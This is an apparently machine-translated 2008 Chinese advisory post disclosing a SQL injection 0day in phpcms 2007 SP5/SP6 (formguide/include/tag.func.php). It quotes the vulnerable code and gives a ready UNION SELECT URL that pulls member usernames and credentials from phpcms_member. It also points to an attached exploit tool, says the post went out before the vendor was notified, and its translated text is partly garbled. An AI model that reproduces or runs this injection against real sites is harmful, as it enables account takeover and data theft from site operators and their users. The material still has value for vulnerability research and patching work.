phpcms injection March New Year 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62200818482
Type myhack58
Reporter 佚名
Modified 2008-03-09T00:00:00


Affected versions: 2007SP5 SP6 Vulnerability file:/formguide/include/tag.func.php Author: backerhack small cockroaches Sources of information: the zero Client Network Security I wish the National female compatriots happy holidays, concerned about the health of women... “she is good, I also good” ------------Ash very lustful dividing line-------------------------------------------------------

{ global $db,$MOD,$MODULE; $formid = (! isset($formid)||$formid==") ? 0 : $formid; $query = "SELECT * FROM ". TABLE_FORMGUIDE." WHERE formid=$formid limit 1"; $r = $db->get_one($query); if(!$ r) { echo $LANG['not_exist_form']; return "; }

The variable formid is not assigned a value and the filter is not strict with the query result of the injection. Test:<http://phpcmsroot/formguide/index.php?formid=1//and//1=2//union//select//1,username,3,4,5,6,7//from//phpcms_member//where/*/userid=1/> Attach sniperhg written using the tool... write really powerful, like this one! phpcms0dayEXP.exe MD5 value: cae31a3ef566ed06068473d787d76359 This article was published before the notification official.

! [](/Article/UploadPic/2008-3/20083993846192.gif) injection.rar